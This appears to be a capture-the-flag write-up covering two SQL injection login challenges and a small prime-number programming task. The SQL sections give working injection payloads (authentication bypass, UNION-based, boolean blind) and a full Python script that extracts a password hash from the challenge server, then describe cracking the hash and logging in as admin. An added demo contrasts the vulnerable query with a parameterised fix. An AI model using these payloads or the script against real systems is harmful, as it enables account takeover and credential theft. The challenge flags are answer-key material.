SQL Breaker 1

I am posting this write-up after the CTF server has been shut down.

So I will not explain everything in detail, but focus on the core ideas.

We can find the login form shown above.

The challenge name is 'SQL Breaker 1', so we can easily guess that this challenge is a kind of SQL injection problem.

When we insert the well-known payload 'or 1=1#, we easily get the flag.

Flag is flag{Sql1nj3ct10n}

SQL Breaker 2

The second challenge has a very similar web UI.

Almost the same login form. But when we insert the payload 'or 1=1-- in the username field, we are logged in as john.

We need to log in as the admin user.

When I tried inserting the payload 'or 1=1-- in the password field, it did not work. I just saw an incorrect username/password error message.

So I guessed the SQL query on the server side is something like this:

SELECT * FROM USER WHERE name='{$name}' and pw=hash('{$password}')

Looking at that query, the password is wrapped in hash(), so I thought it is better to insert the payload in the username field rather than the password field.

After several more trials, I guessed that there is no admin account row in the server database.

So I tried union-based SQL injection.

I inserted the payloads below in the username field.

dddd'union select 'admin'-- 

dddd'union select 'admin', 'admin'-- 

dddd'union select 'admin','admin', 'admin'--

Those all resulted in a login failure, so I guessed that the number of columns returned is not a small number like 1 or 2.

When I inserted a union payload with 5 columns, it succeeded.

dddd'union select '1','2','3','4','5'-- 

But it was still logged in as john.

After more thought, I tried blind SQL injection to get more information about the data in the server database.

I extracted the password field and the id field with payloads like these:

john' and length(password) > 5-- 

john' and ord(substr(name,2,1)) > 5-- 

#!/usr/bin/env python3
# Boolean-based blind SQL injection helper for the challenge above. The login page
# shows "Welcome" only when the injected condition is true, so every request is a
# one-bit oracle and each value is recovered with a binary search.

import sys
import urllib.parse
import urllib.request

URL = "https://challenges.neverlanctf.com:1165/login.php"
UA = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
Cookie = "PHPSESSID=bhon2smt11sccq4nehiglstqaj"  # session cookie taken from the browser
HEADERS = {"User-Agent": UA, "Cookie": Cookie}


def logout():
    # Log the current session out before each probe.
    req = urllib.request.Request(URL + "?logout", headers=HEADERS)
    urllib.request.urlopen(req).read()


def query(Q):
    # Send Q as the username (the form parameters travel in the query string)
    # and report whether the login succeeded.
    logout()
    req = urllib.request.Request(URL + "?password=1&username=" + urllib.parse.quote(Q),
                                 headers=HEADERS)
    text = urllib.request.urlopen(req).read().decode("utf-8", "replace")
    if "location.href" in text:
        print("Session expired...")
        sys.exit()
    # print(text)
    return "<h2>Welcome" in text


def find_length():
    # Binary search for length(name); the answer lies in (left, right].
    left = 0
    right = 200
    while left < right:
        mid = (left + right) // 2
        print("Finding... {} {} {}".format(left, mid, right))
        if query("john' and length(name) > {}-- ".format(mid)):
            left = mid + 1
        else:
            right = mid
    return right


def find_ch(pos):
    # Binary search for the byte value of the character at 1-based position pos.
    print("Finding pos {} th character".format(pos))
    left = 0
    right = 1 << 8
    while left < right:
        mid = (left + right) // 2
        print("Finding... {} {} {}".format(left, mid, right))
        if query("john' and ord(substr(name,{},1)) > {}-- ".format(pos, mid)):
            left = mid + 1
        else:
            right = mid
    print("COOL!! {} = {}".format(pos, right))
    return right


LENGTH = find_length()
print("LENGTH = {}".format(LENGTH))
PASSWORD = ""
for i in range(1, LENGTH + 1):
    PASSWORD += chr(find_ch(i))
    print(PASSWORD)

print(PASSWORD)

query(PASSWORD)

An interesting result occurred.

password = "0a4b0ae54adbdc2825e1b05e16c7164cfdfce29e8f6fd104c7e539fc39e5c619"

id = "1"

The password length was 64 hex characters, so I thought it was a 256-bit hash digest.

When I looked it up in a common online SHA-256 reverse-lookup database, the result was "T3stUs3r".

When I tried to log in with John/T3stUs3r, it succeeded.

I thought the id value in the database was "John", but it was the number 1.

I tried union-based SQL injection with another id number:

dddd'union select '2','2','3','4','5'-- 

This payload gave me a login session as the admin account.

The first returned column must be the id value in the database: id=1 is user john, id=2 is user admin.
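The behaviour of both SQL Breaker challenges reproduced locally, as an added example that is not part of the original post or the challenge code: a constructed SQLite table modelled on the guessed query (five columns with the id first, john at id=1, admin at id=2, and hash() registered as SHA-256), with the vulnerable string-built login beside its parameterised fix. The table layout, column names and the admin password are assumptions.

```python
import hashlib
import sqlite3

def sha256_hex(s):
    return hashlib.sha256(s.encode()).hexdigest()

def make_db():
    # Constructed sample data modelled on the guessed schema: five columns with the
    # id first, john at id=1 and admin at id=2 (the admin password is a placeholder).
    conn = sqlite3.connect(":memory:")
    conn.create_function("hash", 1, sha256_hex)  # stand-in for the server's hash()
    conn.execute("CREATE TABLE user (id INTEGER, name TEXT, pw TEXT, email TEXT, role TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?, ?, ?)", [
        (1, "john", sha256_hex("T3stUs3r"), "john@example.test", "user"),
        (2, "admin", sha256_hex("PLACEHOLDER-admin-password"), "admin@example.test", "admin"),
    ])
    return conn

def login_vulnerable(conn, name, password):
    # Mirrors the guessed query: both inputs are pasted into the SQL text, and the
    # session is built from the first column of whatever row comes back, so a UNION
    # row can choose the id. A statement broken by injecting inside hash('...') or by
    # a column-count mismatch raises an error, which the app shows as a failed login.
    sql = "SELECT * FROM user WHERE name='%s' and pw=hash('%s')" % (name, password)
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return int(row[0]) if row else None

def login_fixed(conn, name, password):
    # Parameterised query: the inputs are bound as values and never parsed as SQL,
    # so quotes, comments and UNION inside them are just characters of a username.
    row = conn.execute("SELECT id FROM user WHERE name=? and pw=hash(?)",
                       (name, password)).fetchone()
    return row[0] if row else None

def user_for_id(conn, uid):
    row = conn.execute("SELECT name FROM user WHERE id=?", (uid,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    for name in ["'or 1=1-- ", "dddd'union select 'admin'-- ",
                 "dddd'union select '2','2','3','4','5'-- "]:
        print(repr(name), "->", user_for_id(db, login_vulnerable(db, name, "1")),
              "| fixed:", login_fixed(db, name, "1"))
```

Running the file shows which account each payload from the write-up logs in as, and that the parameterised version rejects all of them.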

 

 

 

Flag is flag{esc4p3y0ur1nputs}

DasPrime

A very simple programming challenge.

Simply correct the Python code so that it produces the correct prime numbers.

import math

def main():
    primes = []
    count = 2   # current candidate number
    index = 0   # number of primes found so far
    while True:
        isprime = True
        # trial division by every x from 2 up to sqrt(count)
        for x in range(2, int(math.sqrt(count) + 1)):
            if count % x == 0:
                isprime = False
                break   # one divisor is enough; no need to keep dividing
        if isprime:
            primes.append(count)
            print(index, primes[index])
            index += 1
            if index == 10497:
                break
        count += 1

if __name__ == "__main__":
    main()

The code above prints (index, prime) pairs from index 0 to index 10496.

Since we count from 0, the prime at index 10496 is actually the 10497th prime.

The prime number detection algorithm is naive.

If a number \(A\) is not divisible by any \(B\) between \(2\) and \(\sqrt{A}\), the number \(A\) is prime.

When you run the Python code above, the result is as follows.

The answer is 110573.